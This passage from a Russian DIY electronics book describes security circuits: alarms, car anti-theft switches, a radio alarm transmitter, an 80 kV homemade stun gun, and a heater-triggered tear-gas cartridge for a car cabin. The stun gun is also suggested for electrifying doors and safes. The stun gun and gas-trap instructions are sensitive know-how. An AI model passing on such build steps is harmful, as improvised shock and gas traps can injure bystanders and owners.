
Устройство предназначено для активной самообороны путем воздействия на нападающего высоковольтным разрядом электротока.

Схема позволяет получить на выходных контактах напряжение до 80000 В, что приводит к пробою воздуха и образованию электрической дуги (искрового разряда) между контактными электродами. Так как при касании электродов протекает ограниченный ток, угрозы для человеческой жизни нет.

Электрошоковое устройство благодаря своим малым размерам может использоваться как индивидуальное средство безопасности или же работать в составе системы охраны для активной защиты металлического объекта (сейфа металлической двери, дверного замка и т.д.). Кроме того, конструкция настоль ко проста, что для изготовления не требует применения промышленного оборудования — все легко выполняется в домашних условиях.

В схеме устройства, рис. 2.25, на транзисторе VT1 и трансформаторе Т1 собран импульсный преобразователь напряжения. Автогенератор работает на частоте 30 кГц, и во вторичной обмотке (3) трансформатора Т1 после выпрямления диодами на конденсаторе С4 выделяется постоянное напряжение около 800...1000 В. Второй трансформатор (Т2) позволяет еще повысить напряжение до нужной величины. Работает он в импульсном режиме. Это обеспечивается регулировкой зазора в разряднике F1 так, чтобы пробой воздуха происходил при напряжении 600...750 В. Как только напряжение на конденсаторе С4 (в процессе заряда) достигнет этой величины, разряд конденсатора проходит через F1 и первичную обмотку Т2.

Энергия, накопленная на конденсаторе С4 (передаваемая во вторичную обмотку трансформатора), определяется из выражения

W = 0.5С х Uc^2 = 0,5 х 0,25 х 10^(-6) х 700^2 = 0,061 [Дж]

 где Uc — напряжение на конденсаторе [В], С — емкость конденсатора С4 [Ф]. 

2-25.jpg

Рис. 2.25. Электрическая схема

Аналогичные устройства промышленного изготовления имеют примерно такую же энергию заряда или чуть меньше.

Питается схема от четырех аккумуляторов типа Д-0,26 и потребляет ток не более 100 мА. Элементы схемы, выделенные пунктиром, являются бестрансформаторным зарядным устройством от сети 220 В. Для подключения режима подзаряда используется шнур с двумя соответствующими вилками. Светодиод HL1 является индикатором наличия напряжения в сети, а диод VD3 предотвращает разряд аккумуляторов через цепи зарядного устройства, если оно не включено в сеть.

В схеме использованы детали резисторы МЛТ, конденсаторы С1 типа К73-17В на 400 В, С2 — К50-16 на 25 В, СЗ — К10-17, С4 — МБМ на 750 В или типа К42У-2 на 630 В. Высоковольтный конденсатор (С4) применять других типов не рекомендуется, так как ему приходится работать в жестком режиме (разряд почти коротким замыканием), который долго выдерживают только эти серии. Диодный мост VD1 можно заменить четырьмя диодами типа КД102Б, а VD4 и VD5 — шестью последовательно включенными диодами КД102Б. Включатель SA1 типа ПД9-1 или ПД9-2.

Трансформаторы являются самодельными и намотка в них начинается совторичной обмотки. Процесс изготовления потребует аккуратности и намоточного приспособления. Трансформатор Т1 выполняется на диэлектрическом каркасе, вставляемом в броневой сердечник Б26, рис 2.26, из феррита М2000НМ1 (М1500НМ1). Он содержит в обмотке 1 — 6 витков, 2—20 витков проводом ПЭЛШО диаметром 0,18 мм (0,12...0,23 мм), в обмотке 3 — 1800 витков проводом ПЭЛ диаметром 0,1 мм. При намотке 3-й обмотки необходимо через каждые 400 витков укладывать конденсаторную диэлектрическую бумагу, а слои пропитывать конденсаторным или трансформаторным маслом. После намотки катушки вставляем ее в ферритовые чашки и склеиваем стык (предварительно убедившись, что она работает). Места выводов катушки заливаются разогретым парафином или воском.

2-26.jpg

Рис. 2. 26. Составные части конструкции броневой катушки

2-27.jpg

Pис. 2. 27. Каркас для намотки высоковольтного трансформатора Т2

При монтаже схемы необходимо соблюдать полярность фаз обмоток трансформатора, указанную на схеме.

Высоковольтный трансформатор Т2 выполнен на пластинах из трансформаторного железа, набранных в пакет, рис. 2.27. Так как магнитное поле в катушке не замкнутое, конструкция позволяет исключить намагничивание сердечника. Намотка выполняется виток к витку (сначала наматывают вторичную обмотку) 2 — 1800... 2000 витков проводом ПЭЛ диаметром 0,08...0,12 мм (в четыре слоя), 1 — 20 витков диаметром 0,35 мм. Межслойную изоляцию лучше выполнять из нескольких витков тонкой (0,1 мм) фторопластовой ленты, но подойдет также и конденсаторная бумага — ее можно достать из высоковольтных неполярных конденсаторов. После намотки обмоток трансформатор заливается эпоксидным клеем. В клей перед заливкой желательно добавить несколько капель конденсаторного масла (пластификатор) и хорошо перемешать. При этом в заливочной массе клея не должно быть пузырьков воздуха. А для удобства заливки потребуется изготовить картонный каркас (размерами 55х23х20 мм) по габаритам трансформатора, где и выполняется герметизация.

2-28.jpg

Рис. 2.28. Конструкция корпуса

Изготовленный таким образом трансформатор обеспечивает во вторичной обмотке амплитуду напряжения более 90000 В, но включать его без защитного разрядника F2 не рекомендуется, так как при таком напряжении возможен пробой внутри катушки Защитный разрядник выполняется из двух оголенных проводов, расположенных на расстоянии 20...24 мм. Конструкция электродов Х2, ХЗ и разрядника F2 показана на рис. 2.28. Элементы конструкции крепятся на боковых пластинах из оргстекла толщиной 5...6 мм. В качестве электродов Х2 и ХЗ можно использовать стержни от разъемов на большой ток, например из серии ШР.

Вид конструкции разрядника F1 приведен на рис. 2.29. В качестве материала лучше взять медные пластины с никелированным покрытием (этим обеспечивается более высокая стойкость разрядника к разрушению дугой). Толщина пластин может быть любой. Пробойное напряжение воздуха примерно 3 кВ на мм (зависит от влажности и атмосферного давления), поэтому зазор разрядника F1 будет примерно 0,1...0,2 мм (регулируется при настройке). Кнопку включения SB1 лучше также сделать самостоятельно — это позволяет учесть особенность конструкции корпуса. Она выполняется из мягкой стальной или медной ленты толщиной примерно 0,5 мм, рис. 2.30.

2-29.jpg
Рис. 2.29. Вид разрядника F1

2-30.jpg

Рис. 2.30. Конструкция кнопки включения SB1

Все детали схемы, кроме выключателя SA1, размещены на односторонней печатной плате из стеклотекстолита толщиной 1...1,5 мм (размером 130х55 мм), рис. 2.31. Таких же размеров плата используется как крышка и элемент крепления выключателя SA1, а также аккумуляторов.

Аккумуляторы размещены по двое в картонных стаканах, склеенных по их размерам (по диаметру) и подпружиниваются к основной плате лепестками закрепленными на крышке.

Детали припаиваются со стороны печатных проводников, что позволяет уменьшить толщину корпуса устройства. Трансформаторы Т1 и Т2 приклеиваются к плате эпоксидным клеем.

Общий вид сборки всей конструкции (без кожуха) показан на рис. 2.32. На каркасе, образованном из двух плат, закрепленных четырьмя винтами (с потайной шляпкой), обматывается и склеивается кожух из картона (он должен сни-
маться при снятой задней стенке). Для придания привлекательного внешнего вида кожух обматывается самоклеющейся пленкой под цвет дерева.

В месте расположения кнопки SA1 выполняется отверстие в кожухе, а на боковую грань приклеивается накладка из тонкой (1...2 мм) пластмассы с прорезями.

2-31.jpg

Рис. 2.31. Топология печатной платы и расположение элементов

Внутри гибкой части пластины клеится резиновый вкладыш, но так, чтобы он не мешал одевать кожух на каркас.

Настройка схемы заключается в получении (резистором R4) устойчивого запуска и работы автогенератора при питании от стационарного источника с напряжением от 3,9 до 5 В. При настройке схемы лучше использовать блок питания в режиме ограничения тока на 1 А — это предотвратит повреждение VT1 в случае ошибочного подключения фазы первичной обмотки Т1 или же отсутствия режима автогенерации по другой причине. После этого с помощью осциллографа с делителем замеряем напряжение на конденсаторе С4 и подбираем величину зазора в разряднике F1 так, чтобы оно не превышало уровня 650...750 В.

2-32.jpg

Рис. 2.32. Вид сборки конструкции

Теперь несколько слов об эксплуатации устройства. При переносе электрошока лучше воспользоваться выключателем SA1 для снятия питания — это исключит работу устройства при случайном нажатии кнопки SB1, например в кармане. Не рекомендуется включать электрошок в условиях высокой влажности, чтобы самому не попасть под напряжение дугового разряда. Кроме того, так как для транзистора VT1 не установлен теплоотводящий радиатор (нет свободного места в корпусе), не рекомендуется включать устройство на непрерывную работу в течение времени более 1 мин (обычно в этом и нет необходимости). Следует также знать, что обычная одежда не является препятствием для проникновения дуги.

 

Pис. 2.27. Каркас для намотки высоковольтного трансформатора Т2

Изображение: 

Рис. 2.25. Электрическая схема

Изображение: 

Рис. 2.26. Составные части конструкции броневой катушки

Изображение: 

Рис. 2.28. Конструкция корпуса

Изображение: 

Рис. 2.29. Вид разрядника F1

Изображение: 

Рис. 2.30. Конструкция кнопки включения SB1

Изображение: 

Рис. 2.31. Топология печатной платы и расположение элементов

Изображение: 

Рис. 2.32. Вид сборки конструкции

Изображение: 

6. Многоканальная охрана для удаленных объектов

Многоканальная охрана для удаленных объектов

Нередко бывает необходимо охранять от проникновения посторонних удаленные от основного блока охраны помещения. При этом от каждого объекта до пульта охраны прокладывается двухпроводная линия (шлейф). Для надежной работы системы охраны схема должна иметь индикацию любого нарушения цепи охранного шлейфа: обрыв или замыкание, а также срабатывание датчика на объекте. В отличие от многих других описанных в литературе систем охраны, данная схема позволяет различать все эти три состояния, а также надежно контролировать работу охранного шлейфа не только с центрального пульта охраны, но и непосредственно на самом объекте (помещении). Кроме того, схема мало потребляет и предусматривает смешанное питание от сети 220 В и аккумулятора — при пропадании сетевого напряжения питание переходит на аккумулятор.

2-33.jpg

Рис. 2.33. Электрическая схема блока, устанавливаемого в охраняемом помещении

Принцип действия устройства основан на обнаружении изменения тока в цепи охранного шлейфа. В отличие от наиболее распространенных мостовых схем, данная работает в импульсном режиме, что более экономично. На каждом охраняемом объекте устанавливается активное устройство, собранное по схеме рис. 2.33. К ней может быть подключено много последовательно соединенных датчиков F1...Fn, срабатывающих на разрыв. В этом случае все они подключаются к схеме так, чтобы срабатывание любого из них разрывало всю цепь.

В качестве датчиков могут применяться любые охранные устройства, имеющие релейный выход.

Электрическая схема состоит из автогенератора на элементах микросхемы D1.2 и D1.3 с частотой примерно 2 Гц (его работа подробно описана в первом разделе). С этой же частотой мигает светодиод HL1. В случае, если сработает один из последовательно включенных датчиков, на входе элемента D1.1/6 появится лог. "1" — ключ замкнется, и перестанет работать автогенератор.

2-34.jpg

Рис. 2.34. Схема центрального пульта охранной сигнализации

В охраняемом помещении индикатором нормального состояния шлейфа сигнализации является мигание светодиода HL1 (при включенном шлейфе данного канала на центральном пульте). Диод VD2 предотвращает повреждение схемы от ошибочного подключения полярности охранного шлейфа при первоначальном подключении системы.

Применение на каждом охраняемом объекте схемы с автогенератором позволяет выполнить центральный пульт довольно простым, при более широких возможностях системы. Схема пульта показана для двух каналов охраны удаленных объектов, рис. 2.34. Все узлы дополнительных каналов идентичны, и поэтому рассмотрим работу всей системы на примере первого канала.

Включение режима охраны нужного объекта (канала) производится соответствующим тумблером 1SA1...nSA1. При этом, если все датчики на охраняемом объекте замкнуты, будут моргать светодиоды 1HL1...nHL1. Эти импульсы через конденсатор 1С1 поступают на базу транзистора 1VT2. Он периодически открывается и разряжает конденсатор 1С2 (точнее можно сказать, что не дает ему зарядиться). Наличие конденсатора исключает случайное срабатывание системы охраны от помех в цепи шлейфа. В случае исчезновения импульсов 1С2 постепенно заряжается до напряжения питания и срабатывает триггер D1.1, что позволяет зафиксировать факт нарушения, даже если оно было кратковременным.

Индикатором нарушения охранного щлейфа является непрерывное свечение светодиода 1HL2 и работа звукового сигнализатора. При этом по состоянию светодиода 1HL1 можно судить о характере нарушения цепи охраны, что очень удобно. Так, при разрыве шлейфа свечения не будет, а в случае непрерывного свечения светодиода — короткое замыкание линии.

Сброс режима оповещения производится тумблером 1SA1 — при выключении своей группой контактов он обнуляет триггер, подавая высокий уровень на вход R.

2-35.jpg

Рис. 2.35. Источник питания

Источник питания для системы охраны, рис. 2.35, собран по классической схеме и в особых пояснениях не нуждается. Для его изготовления подойдет любой трансформатор мощностью 20...30 Вт, обеспечивающий во вторичной обмотке напряжение 10...12 В и ток до 1 А (в дежурном режиме система потребляет ток не более б мА на каждый включенный канал). Максимальный ток трансформатора должен соответствовать потребляемому звуковым сигнализатором. Транзистор VT1 устанавливается на радиатор.

Настройка схемы пульта заключается в регулировке чувствительности срабатывания транзистора 1VT1 (резистором 1R2) к импульсам от удаленного генератора под реальную линию шлейфа (в других каналах аналогично).

Топология печатной платы для схемы автогенератора, устанавливаемого на охраняемом объекте, показана на рис. 2.36 (она имеет две перемычки).

В схемах применены постоянные резисторы МЛТ, подстроечные (1R2...nR2) многооборотные С5-2. Неполярные конденсаторы типа К10-17, электролитические 1С2...пС2 типа К53-1 на 20 В, а в источнике питания К50-35 на 25 В. В качестве звукового сигнализатора НА1 может использоваться любой из предназначенных для автомобильной сигнализации. Для звукового оповещения можно воспользоваться и обычным динамиком, включенным по схеме с генератором, показанным на рис. 2.37. В этом случае звук будет прерывистым и появится возможность регулировать громкость работы динамика подстроечным резистором.

2-36.jpg

Рис. 2.36. Топология печатной платы и расположение элементов

2-37.jpg

Рис. 2.37. Схема подключения

При желании данная схема кроме охранных функций может использоваться и в качестве пожарной сигнализации. Для этого в цепь задающего часто ту резистора R2 последовательно добавляется терморезистор из серии СТ2-19 (15 кОм), а номинал элементов (R2, С2, R3 и R5) изменяется так, чтобы получить частоту 2 Гц при номинале R2=10...15 кОм. Методика расчета номиналов этих элементов приведена в первом разделе.

При этом частота работы автогенератора будет зависеть от температуры в помещении, и, дополнив схему центрального пульта анализатором частоты, можно иметь пожарную сигнализацию в дополнение к обычной охранной.

 

Рис. 2.33. Электрическая схема блока, устанавливаемого в охраняемом помещении

Изображение: 

Рис. 2.34. Схема центрального пульта охранной сигнализации

Изображение: 

Рис. 2.35. Источник питания

Изображение: 

Рис. 2.36. Топология печатной платы и расположение элементов

Изображение: 

Рис. 2.37. Схема подключения

Изображение: 

7. Использование сетевых проводов в качестве шлейфа охранной сигнализации

Использование сетевых проводов в качестве шлейфа охранной сигнализации

Действие устройства основано на том свойстве, что по проводам электрической сети можно передавать высокочастотные колебания с частотой до 150 кГц. Они свободно распространяются до ближайшего трансформатора. Этот же принцип используется при передаче по радиотрансляционным проводам трех станций, две из которых передаются с модуляцией частот 78 и 120 кГц.

При частотах более 150 кГц часть ВЧ энергии начинает излучаться в эфир, создавая помехи. По этой причине применять более высокие частоты для передачи информации по сетевым проводам нецелесообразно.

На охраняемом объекте устанавливается блок устройства, электрическая схема которого показана на рис. 2.38. Она состоит из двух автогенераторов. Первый генератор на элементах микросхемы D1.1 и D1.2 вырабатывает импульсы частотой 2 Гц и модулирует второй генератор (D1.3 и D1.4), работающий на частоте 70 кГц, рис. 2.39. На транзисторе VT1 собран резонансный усилитель. С выхода вторичной обмотки трансформатора пачки ВЧ колебаний через конденсаторы С5 и С6 поступают в сеть.

Устройство питается непосредственно от сети по бестрансформаторной схеме, что позволяет уменьшить его габариты. Подключение выполняется с соблюдением фазировки,указанной на схеме.

При правильном монтаже схема будет работать сразу, а настройка заключается в получении резонанса в контуре катушки L2 на частоте 70 кГц. Проверку схемы лучше выполнять при ее питании от стационарного источника.

В качестве приемника можно воспользоваться схемой усилителя, приведенной на рис. 2.40, а если необходимо получить большую дальность работы, подойдет схема рис. 2.13 с небольшими изменениями во входной цепи и конструкции катушек.

Катушки L1 и L3 одинаковые и выполнены в ферритовых чашках СБ-12 или аналогичных от контуров промежуточной частоты (465 кГц) приемников. Они должны предусматривать возможность настройки с помощью сердечников. Обмотка 1 содержит 160 витков, 2 — 50 витков проводом ПЭЛШО диаметром 0,08 мм.

2-38.jpg

Pис. 2.38. Электрическая схема блока

2-39.jpg

Рис. 2.39. Форма сигналов, поясняющих работу схемы

Дроссель L2 содержит 200 витков тем же проводом на ферритовом кольце 600...2000НМ типоразмера К10х6х3 мм. Параметры катушки L4 такие же, как и у показанной на рис. 2.17.

В схемах применены резисторы типа МЛТ, конденсаторы С2 типа К53-18 на 20 В; С5, С6, С7, С8 — типа К73-17В на соответствующее рабочее напряжение. Остальные конденсаторы типа К10-17 или любые малогабаритные.

2-40.jpg

Рис. 2.40. Блок приемника

2-41.jpg

Рис. 2.41. Топология печатной платы блока охраны

Топология односторонней печатной платы для схемы блока охраны приведена на рис. 2.41 (пунктиром показаны две перемычки, которые устанавливаются до начала монтажа элементов).

 

Pис. 2.38. Электрическая схема блока

Изображение: 

Рис. 2.39. Форма сигналов, поясняющих работу схемы

Изображение: 

Рис. 2.40. Блок приемника

Изображение: 

Рис. 2.41. Топология печатной платы блока охраны

Изображение: 

9. Простые противоугонные устройства

Простые противоугонные устройства

Самое простое сторожевое устройство для автомобиля, из описанных в литературе, показано на рис. 2.42. Схема состоит всего из одного диода, устанавливаемого между генератором напряжения и аккумулятором, а также тумблера SA1.

2-42.jpg

Рис. 2.42. Простейшее противоугонное устройство

Устройство включается на охрану тумблером и начинает проявлять себя только при попытке завести двигатель — начнет работать клаксон автомобиля, но надежнее, если это будет дополнительно установленный ревун. Перед запуском двигателя владелец должен отключить сторожевой сигнализатор скрытно установленным тумблером.

Диод можно использовать любой на прямой ток не менее 50 А и обратное напряжение не менее 20 В.

Такая схема хотя и привлекательна своей простотой, но обладает рядом недостатков: по характеру появления звука несложно понять место подключения и принцип работы сигнализатора, а при неработающем двигателе спокойно его отключить.

На рис. 2.43 приведена более совершенная схема, использующая ту же самую идею. Дополнительно установленное реле К1 своими контактами самоблокируется и позволяет зафиксировать во включенном состоянии питание ревуна независимо от дальнейших действий угонщика. В таком состоянии схема будет находиться, пока ее не отключат тумблером SA1 или же не разрядится аккумулятор, что, учитывая его большую емкость и относительно небольшое потребление энергии звуковым сигнализатором (0,2...0,3 А), произойдет нескоро.

Если тумблер SA1 применить с двумя группами переключающих контактов, например типа ТЗ, то свободную группу можно использовать в разрыв цепи замка зажигания, для блокировки запуска двигателя.

Диоды VD2 и VD3 подойдут любые на ток не менее 1 А.

Реле К1 лучше использовать в герметичном исполнении, например типа РЭС48А, паспорт РС4.590.202, или аналогичное, на рабочее напряжение 12 В.

Обеспечить фиксацию срабатывания ревуна можно и без помощи реле, рис. 2.44. В этом случае используется электронный коммутатор — тиристор VS1. При однократном срабатывании он будет находиться в открытом состоянии, пока не будет разорвана цепь ревуна. В этой схеме нельзя использовать звуковой сигнализатор, имеющийся в автомобиле, из-за того что принцип его работы подобен зуммеру, — колеблющаяся мембрана связана с группой контактов, которые разрывают цепь катушки. Из-за прерывистости тока через катушку гудка тиристор выключается по окончании действия сигнала на управляющем электроде.

2-43.jpg

Рис. 2.43. Противоугонное устройство с непрерывной работой ревуна

2-44.jpg

Рис. 2.44. Электронный способ фиксации срабатывания сигнализации

Схему можно сделать еще проще, если воспользоваться в качестве датчика работы электрооборудования автомобиля токовым реле К1, рис. 2.45. Кроме того, данная схема позволяет подключить дополнительные датчики, срабатывающие на замыкание (F1, F2). Их можно установить на капоте и в багажнике. Появление тока в цепи, где включена обмотка К1, приведет к срабатыванию группы контактов К1.1, которые включат тиристор VS1.

Токовое реле несложно изготовить самостоятельно на основе геркона, рис. 2.46. Геркон потребуется чуть больше, чем наиболее распространенные КЭМ-1 Его можно достать, например, разобрав герконовое реле из серии РПГ-8. На стеклянный баллон наклеивается бумажный каркас и наматываются в два слоя 20 витков проводом марки ПЭВ с диаметром 1,8...2,5 мм. В зависимости от типа применяемого геркона он будет срабатывать при токе более 1,6...4,6 А (наиболее чувствительны герконы с одной группой нормально разо

2-45.jpg

Рис. 2.45. Использование токового реле в схеме сигнализации

2-46.jpg

Рис. 2.46. Конструкция токового реле с использованием геркона

мкнутых контактов). При этом внутреннее сопротивление токового реле очень мало и никакого влияния на работу электрооборудования не оказывает.

Еще один вариант включения охранного сигнализатора показан на рис. 2.47. Цепь базы транзистора подключается так, чтобы при замыкании контактов замка зажигания конденсатор С1 начинал заряжаться через диод и резистор R1. Транзистор VT1 открывается, и срабатывает тиристор VS1, включая звуковой сигнализатор.

2-47.jpg

Рис. 2.47. Вариант включения сигнализации

Такие противоугонные устройства могут использоваться как отдельно, так и в составе многофункциональной сигнализации. Кроме того, благодаря своей простоте они легко устанавливаются на мотоцикл или любое другое транспортное средство, где нет необходимости (или места) для установки более сложной системы охраны. При этом следует поместить все детали устройства в закрытый корпус из диэлектрического материала, чтобы исключить замыкание цепей на корпус и возникновения пожара.

В качестве общего недостатка приведенных схем можно отменить ограниченное число мест, где может быть установлен тумблер выключения охраны. Это увеличивает вероятность его быстрого обнаружения.

 

Рис. 2.42. Простейшее противоугонное устройство

Изображение: 

Рис. 2.43. Противоугонное устройство с непрерывной работой ревуна

Изображение: 

Рис. 2.44. Электронный способ фиксации срабатывания сигнализации

Изображение: 

Рис. 2.45. Использование токового реле в схеме сигнализации

Изображение: 

Рис. 2.46. Конструкция токового реле с использованием геркона

Изображение: 

Рис. 2.47. Вариант включения сигнализации

Изображение: 

10. Пиропатрон — элемент активной охраны

Пиропатрон — элемент активной охраны

Как правило, большинство систем охраны не обеспечивают полной сохранности автомобиля, а просто пассивно мешают злоумышленнику осуществить свой план. При этом стоит задача с помощью сирены привлечь внимание окружающих людей или хозяина к попыткам проникновения в салон постороннего или другим действиям вора. Если днем это еще иногда пугает угонщика, то ночью хозяин может крепко спать и не услышит звукового сигнала — ведь воры отключают его в первую очередь. В этом случае может быть полезным применение в составе охранной сигнализации пиропатрона. Это устройство одноразового действия и кроме шумового эффекта может обеспечить задымление салона автомобиля слезоточивым газом. При срабатывании пиропатрона в кабине никому не удастся воспользоваться автомобилем в течение ближайших 10...15 мин.

Купить специально предназначенный для охранной сигнализации пиропатрон промышленного изготовления мне не удалось (хотя они и существуют). По этой причине пришлось заняться его изготовлением самостоятельно.

Вариант простой конструкции для выполнения пиропатрона показан на рис. 2.48 (вид без кожуха). В ее основе используется патрон (диаметром 9 мм со слезоточивым газом или шумового действия) от любого газового пистолета не барабанного типа.

2-48.jpg

Рис. 2.48. Вид конструкции

Между двумя стенками в углублении закрепляется патрон. Основание его закрывается тонкой слюдой, на которой плотно намотаны 20...23 витка нихромового провода диаметром 0,5 мм. Обмотка сверху закрывается асбестовым слоем. Выводы нихромового нагревателя зажимаются гайками на шпильках. Стенки выполнены из толстого стеклотекстолита или любого другого термостойкого и прочного диэлектрика. Чертеж передней стенки показан на рисунке. Задняя стенка отличается от передней только отсутствием сквозного отверстия в углублении для крепления патрона. На стенках винтами М3х5 крепится кожух, согнутый из тонкой металлической фольги по размерам каркаса.

Такое устройство можно установить в схеме, показанной на рис. 2.42, вместо звукового гудка или параллельно с ним. При подключении пиропатрона к любой другой сигнализации желательно предусмотреть ограничение времени работы обмотки нагревателя интервалом 30...40 с, что исключит напрасный расход энергии аккумулятора. Для срабатывания пиропатрона достаточно питания нагревателя в течении 6...9 с. Для этого может быть использована схема таймера, собранная по любому из двух показанных на рис. 2.49 вариантов. При включении нагревателя (Rн) через схему таймера время, в течение которого на него будет подаваться питание, задается номиналами элементов С1 и R1.

2-49.jpg

Рис. 2.49. Электрическая cxeмa таймера

По сравнению с автоматическими устройствами для распыления слезоточивого газа из баллончика данное имеет меньшие габариты и более простую конструкцию.

 

Рис. 2.48. Вид конструкции

Изображение: 

Рис. 2.49. Электрическая cxeмa таймера

Изображение: 

11. Охрана автомобиля с оповещением по радиоканалу

Охрана автомобиля с оповещением по радиоканалу

Устройство может использоваться для охраны любого автомобиля, гаража или другого удаленного до 500...1000 метров объекта.

В условиях города срабатывание звуковой сирены многих раздражает, особенно если это происходит ночью. Более надежным будет подключать охрану к системе оповещения по радиоканалу. Милиция рекомендует не отключать звуковой сигнал, даже если у вас установлена система радиоохраны. Однако ночью она вряд ли привлечет внимание окружающих с целью поимки воров.

Радиосторож состоит из трех основных блоков: передающего, приемногои стационарного источника питания с зарядным устройством для приемника, рис. 2.50. Радиопередатчик управляется блоком временных интервалов и при срабатывании датчиков начинает излучать высокочастотный радиосигнал, модулированный импульсным кодом. Приемник на фоне помех и других сигналов выделяет "свой" и включает звуковое оповещение хозяина. В случае тревоги может включаться также и звуковой сигнализатор, установленный на автомобиле.

Дальность устойчивого приема на открытой местности составляет не менее 1 км, но в условиях большого города из-за отражений и поглощения сигнала препятствиями, а также помех в эфире расстояние может уменьшиться. Чтобы быть уверенным в том, что высокочастотный сигнал нормально принимается приемником в данном месте, при включении блока охраны схема обеспечивает режим проверки радиоканала через 4 мин после установки в режим "охрана". Этого времени вполне хватит, чтобы дойти домой, где включенный приемник устанавливается в удобное место. При необходимости приемник соединяется со стационарным блоком питания. В этом случае может происходить подзаряд аккумуляторов приемника.

2-50.jpg

Рис. 2.50. Блок-схема системы

Приемник в переносном варианте питается от аккумулятора с напряжением 3...4 В, а передатчик может иметь смешанное питание — от аккумулятора автомобиля и резервной батареи. При использовании трех аккумуляторов типа Д-0,26 непрерывная автономная работа приемника может составлять 118 часов (около пяти суток).

Габаритные размеры блока, устанавливаемого на автомобиле, — 140х140х30 мм, радиоприемника— 127х67х25 мм.

 

2.10.1. Радиопередатчик

Радиопередатчик

Для работы охранных устройств с оповещением по радиоканалу Государственным комитетом по радиочастотам выделена фиксированная частота 26,945 МГц. А чтобы обеспечить для передатчика ее высокую стабильность в широком температурном диапазоне (-40...+60°С), необходимо использовать кварцевую стабилизацию частоты.

Передатчик собран по классической схеме, рис. 2.51. Высокочастотный сигнал с автогенератора на транзисторе VT1 через промежуточный усилитель на VT2 подается на оконечный усилитель VT4. У промежуточного усилителя коллекторный контур настраивается с помощью сердечника катушки L2 на первую гармонику задающего генератора. Катушка L2 имеет неполное включение, что увеличивает добротность контура. Усилитель на VT2 позволяет уменьшить влияние изменения режима оконечного каскада на работу задающего автогенератора, а также обеспечивает достаточный уровень сигнала для работы усилителя мощности.

2-51.jpg

Рис. 2.51. Электрическая схема высокочастотной части передатчика

Оконечный усилитель: работает в режиме класса С. Ключевой режим хотя и имеет меньшее усиление, но он самый экономичный при хорошей термоетабильности. Импульсная мощность ВЧ сигнала, подводимого к антенне, около
2 Вт. Для согласования каскада усилителя с низким входным сопротивлением антенны и уменьшения уровня высших гармоник в сигнале применен двухзвенный П-фильтр из элементов C12-L4-C14-L5-C16. Для точной настройки выходного фильтра предусмотрены элементы настройки: С13, С15 и подстроечный сердечник в катушке L4.

Импульсная модуляция ВЧ сигнала осуществляется в каскаде промежуточного усиления при помощи транзистора VT3. Конденсаторы С5 и С6 обеспечивают заваливание фронтов выходного сигнала, рис. 2.52. Это необходимо, чтобы ограничить спектр высокочастотного сигнала (отведенная полоса канала 10кГц).

2-52.jpg

Рис. 2.52. Форма выходного сигнала передатчика

Выход передатчика соединяется с антенной высокочастотным кабелем с 50-омным "волновым сопротивлением через разъем XW1. Вблизи от антенны расположено согласующее устройство, состоящее из катушки L6 (в экране). Длина соединительного кабеля от согласующего устройства до основного блока составляет 1,64 м или кратна этому значению (3,28 м).

Все остальные элементы высокочастотной части схемы располагаются на печатной плате из одностороннего стеклотекстолита толщиной 1,5...2 мм с размерами 115х35 мм, рис. 2.53, которая помещается в экранированном отсеке корпуса блока охраны.

В схеме применены детали: резисторы типа С2-23, постоянные конденсаторы К10-17, при этом СЗ...С7, С12, С14 и С16 выбираются с минимальным ТКЕ (М75, М47, МЗЗ), подстроечные С13 и С15 типа К4-236 или К4-216. Использован кварцевый резонатор РК169МВ-14ЕП-26945К-В. Катушки выполняются на диэлектрических каркасах диаметром 5 мм, и их вид показан для L1, L2 и L4 на рис. 2.54.

Катушка L5 должна иметь конструкцию, которая обеспечивает её горизонтальное расположение на плате (рис. 2.55) (это снижает влияние полей близко расположенных катушек друг на друга). Намотка выполняется виток к витку проводом ПЭТВ-2 или ПЭЛ-2: L1 содержит 14 витков проводом диаметром 0,23 мм; L2 14 витков с отводом от середины, L4 — 10 витков, L5 — 10 витков проводом диаметром 0,42 мм.

2-53.jpg

Рис. 2.53. Топология печатной платы и расположение элементов высокочастотной
части передатчика

2-54.jpg

Рис. 2.54. Конструкция катушки

2-55.jpg

Pис. 2.55. Конструкция катушки

Подстроечные сердечники могут быть из любого высокочастотного феррита с резьбой М4. Катушка дросселя L3, рис. 2.56, выполняется проводом диаметром 0,12 мм на корпусе резистора МЛТ-0,5 с сопротивлением 1...1.8 кОм и содержит 50 витков. После намотки у всех катушек провод фиксируется клеем "Момент", БФ-4. А для того чтобы сердечники катушек от вибрации при эксплуатации системы в жестких условиях не смещались, их до вкручивания в каркас катушки смазываем несохнущим вязким герметиком.

Поляризованное реле К.1 подойдет типа РЭС32Б РС4.520.204, РС4.520.212 или РС4.520.220. Транзистор VT4 можно заменить на КТ925Б.

На корпусе передатчика устанавливается высокочастотное гнездо XW1 (розетка приборная) типа СР-50-73Ф ГУ3.640.073Сп, а на кабеле от согласующего с антенной устройства — вилка кабельная СР-50-74Ф ГУ3.640.706Сп.

2-56.jpg

Рис. 2.56. Конструкция дросселя L3

2-57.jpg

Рис. 2.57. Антенна с согласующим устройством

Антенна, рис. 2.57, соединяется с согласующим устройством гибким многожильным проводом (длиной 100...200 мм). Согласующая катушка L6 выполняется на каркасе, рис. 2.54, и содержит 25 витков провода ПЭВ диаметром 0,23 мм. Соединение с блоком передатчика осуществляется высокочастотным кабелем РК50-2-16 или аналогичным.

Антенна передатчика может иметь два варианта исполнения. Обе конструкции обеспечивают ее скрытую установку внутри салона автомобиля (вблизи стекла). Это хотя и сильно снижает эффективность (КПД) антенны, но зато исключает повреждение радиоканала системы до срабатывания охраны.

Первый вариант выполняется из стальной проволоки длиной примерно 140...160 мм и диаметром 1,5...2 мм, что позволяет ее расположить над стеклом по дуге и закрепить концы стержня под уплотнительную резиновую прокладку стекла переднего или заднего вида. Она не мешает обзору водителя, а снаружи автомобиля при близком рассмотрении будет казаться, что стекло, имеет в этом месте внутреннюю трещину.

Второй вариант может быть установлен только вблизи стекла заднего вида, а для изготовления антенны взят трехпроводный телефонный кабель, имеющий форму в виде пружинящей спирали (ее удобно закрепить вблизи стекла по диагонали ее с помощью резиновых присосок). Такой провод используют в отечественных телефонных аппаратах для соединения разговорной трубки с аппаратом. Все провода спаиваются между собой и соединяются с согласующим устройством. Согласующее устройство с помощью лепестка экрана крепится к корпусу автомобиля под обшивкой в любом удобном месте.

2-58.jpg

Рис. 2.58. Эквивалентная антенна, нагрузка для настройки передатчика

